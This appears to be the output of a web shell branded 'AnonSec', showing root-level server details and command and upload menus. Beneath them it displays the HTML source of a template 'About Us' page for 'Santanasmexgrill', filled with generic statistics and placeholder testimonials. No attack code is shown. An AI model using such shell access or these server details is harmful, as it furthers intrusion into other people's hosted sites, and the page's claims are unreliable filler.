|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../amavezon.com/../santanasmexgrill.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Santanasmexgrill</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<meta name="theme-variant" content="d09e591e44bc453f0516a092b97eefdf">
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-white border-b border-gray-200">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-2xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-2xl">S</span>
</div>
<span class="self-center text-2xl font-black text-gray-900">
Santanasmexgrill </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-500 rounded-lg md:hidden hover:bg-gray-100">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-bold flex flex-col md:flex-row md:space-x-10 items-center">
<li><a href="./" class="block py-2 text-gray-700 hover:text-roseHome</a></li>
<li><a href="about-us.php" class="block py-2 text-gray-700 hover:text-rose-600 transition-colors">About</a></li>
<li><a href="blog/" class="block py-2 text-gray-700 hover:text-rose-600 transition-colors">Blog</a></li>
<li>
<a href="contact.php" class="block py-3 px-8 text-white bg-gradient-to-r from-rose-600 to-red-600 rounded-full hover:shadow-lg transition-all">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-white py-20" id="about">
<div class="max-w-screen-xl mx-auto px-4">
<div class="flex flex-col-reverse lg:flex-row gap-12 items-center">
<div class="lg:w-1/2">
<div class="grid grid-cols-2 gap-4">
<div class="space-y-4">
<div class="bg-rose-100 p-8 rounded-2xl">
<div class="text-4xl font-black text-rose-600 mb-2">15+</div>
<div class="text-sm font-semibold text-gray-700">Years Experience</div>
</div>
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="rounded-2xl w-full h-48 object-cover">
</div>
<div class="space-y-4 pt-12">
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="Team" class="rounded-2xl w-full h-48 object-cover">
<div class="bg-red-100 p-8 rounded-2xl">
<div class="text-4xl font-black text-red-600 mb-2">98%</div>
<div class="text-sm font-semibold text-gray-700">Client Satisfaction</div>
</div>
</div>
</div>
</div>
<div class="lg:w-1/2">
<span class="inline-block px-4 py-2 bg-rose-600 text-white text-xs font-bold uppercase rounded-full mb-6">
Restaurant Excellence </span>
<h2 class="text-5xl font-black text-gray-900 mb-6">
Streamline kitchen operations with real-time orders </h2>
<p class="text-lg text-gray-600 mb-8 leading-relaxed">
Our comprehensive restaurant management platform helps you deliver exceptional dining experiences while streamlining operations. From reservations to inventory, everything in one place. </p>
<ul class="space-y-4 mb-10">
<li class="flex items-center space-x-3">
<i class="fas fa-check-circle text-green-500 text-xl"></i>
<span class="text-gray-900 font-semibold">Industry Leaders</span>
</li>
<li class="flex items-center space-x-3">
<i class="fas fa-check-circle text-green-500 text-xl"></i>
<span class="text-gray-900 font-semibold">Certified Professionals</span>
</li>
<li class="flex items-center space-x-3">
<i class="fas fa-check-circle text-green-500 text-xl"></i>
<span class="text-gray-900 font-semibold">Award-Winning Service</span>
</li>
</ul>
<a href="#contact" class="inline-block px-10 py-5 bg-gradient-to-r from-rose-600 to-red-600 text-white font-bold rounded-full hover:shadow-2xl transition-all">
Transform your restaurant </a>
</div>
</div>
</div>
</section>
<section class="relative bg-gradient-to-br from-rose-600 to-red-700 py-24 overflow-hidden" id="features">
<div class="absolute inset-0 opacity-10">
<div class="absolute top-0 left-0 w-96 h-96 bg-white rounded-full -translate-x-1/2 -translate-y-1/2"></div>
<div class="absolute bottom-0 right-0 w-96 h-96 bg-white rounded-full translate-x-1/2 translate-y-1/2"></div>
</div>
<div class="max-w-screen-xl mx-auto px-4 relative z-10">
<div class="text-center mb-20">
<h2 class="text-5xl md:text-6xl font-black text-white mb-6">Powerful Features</h2>
<p class="text-xl text-white/90 max-w-3xl mx-auto">Everything you need to succeed</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-6">
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-bolt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Fast</h3>
<p class="text-gray-600">Lightning speed</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-lock text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Secure</h3>
<p class="text-gray-600">Bank security</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-mobile-alt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Mobile</h3>
<p class="text-gray-600">All devices</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-sync text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Updated</h3>
<p class="text-gray-600">Always current</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-users text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Team</h3>
<p class="text-gray-600">Collaboration</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-chart-bar text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Analytics</h3>
<p class="text-gray-600">Insights</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cloud text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Cloud</h3>
<p class="text-gray-600">Anywhere</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cog text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Custom</h3>
<p class="text-gray-600">Tailored</p>
</div>
</div>
</div>
</section>
<section class="bg-white py-20">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-6">
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-rose-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-rose-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-smile text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-rose-600 mb-2">500+</div>
<div class="text-gray-700 font-semibold">Happy Clients</div>
</div>
</div>
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-rose-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-rose-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-heart text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-rose-600 mb-2">98%</div>
<div class="text-gray-700 font-semibold">Satisfaction</div>
</div>
</div>
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-rose-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-rose-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-headset text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-rose-600 mb-2">24/7</div>
<div class="text-gray-700 font-semibold">Support</div>
</div>
</div>
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-rose-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-rose-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-award text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-rose-600 mb-2">15+</div>
<div class="text-gray-700 font-semibold">Years</div>
</div>
</div>
</div>
</div>
</section>
<section class="bg-rose-600 py-20" id="testimonials">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center text-white mb-16">
<h2 class="text-6xl font-black mb-4">Client Testimonials</h2>
<p class="text-2xl text-white/80">Don't just take our word for it</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-6">
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/36.jpg" alt="Jennifer Kim" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-rose-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Online ordering integration boosted sales 40%. Customer loyalty program works beautifully."</p>
<div class="font-bold text-gray-900 text-sm">Jennifer Kim</div>
<div class="text-xs text-gray-600 mt-1">Café Owner</div>
</div>
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/25.jpg" alt="Anthony Russo" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-rose-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Reservation management and table turnover optimization increased revenue by 35%. Exceptional solution."</p>
<div class="font-bold text-gray-900 text-sm">Anthony Russo</div>
<div class="text-xs text-gray-600 mt-1">Restaurant Owner</div>
</div>
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/59.jpg" alt="David Park" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-rose-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"POS integration and staff scheduling simplified our daily operations. Best investment we've made."</p>
<div class="font-bold text-gray-900 text-sm">David Park</div>
<div class="text-xs text-gray-600 mt-1">General Manager</div>
</div>
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/99.jpg" alt="Sofia Garcia" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-rose-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Event management and client communication became effortless. We handle twice the volume with ease."</p>
<div class="font-bold text-gray-900 text-sm">Sofia Garcia</div>
<div class="text-xs text-gray-600 mt-1">Catering Director</div>
</div>
</div>
</div>
</section>
<footer class="bg-gradient-to-br from-gray-50 via-white to-gray-50 text-gray-900 py-16 border-t-4 border-rose-500">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-14 h-14 bg-gradient-to-br from-rose-500 to-red-600 rounded-2xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-2xl">S</span>
</div>
<span class="text-3xl font-black text-gray-900">Santanasmexgrill</span>
</a>
<p class="text-gray-600 mb-6 max-w-md">Delivering excellence and innovation to help your business thrive.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-rose-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-rose-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-rose-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-rose-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-black mb-6 text-gray-900">Navigation</h3>
<ul class="space-y-3 text-gray-600">
<li><a href="./" class="hover:text-roseHome</a></li>
<li><a href="about-us.php" class="hover:text-rose-600 transition-colors">About Us</a></li>
<li><a href="blog/" class="hover:text-roseBlog</a></li>
<li><a href="contact.php" class="hover:text-rose-600 transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-black mb-6 text-gray-900">Legal</h3>
<ul class="space-y-3 text-gray-600">
<li><a href="privacy.php" class="hover:text-rose-600 transition-colors">Privacy Policy</a></li>
<li><a href="terms.php" class="hover:text-rose-600 transition-colors">Terms of Service</a></li>
<li><a href="disclaimer.php" class="hover:text-rose-600 transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-200 pt-8">
<div class="flex flex-col md:flex-row justify-between items-center gap-4">
<p class="text-gray-600 text-sm">© 2026 Santanasmexgrill. All rights reserved.</p>
<div class="flex items-center gap-2 text-sm text-gray-600">
<span>Made with</span>
<i class="fas fa-heart text-rose-600"></i>
<span>for you</span>
</div>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021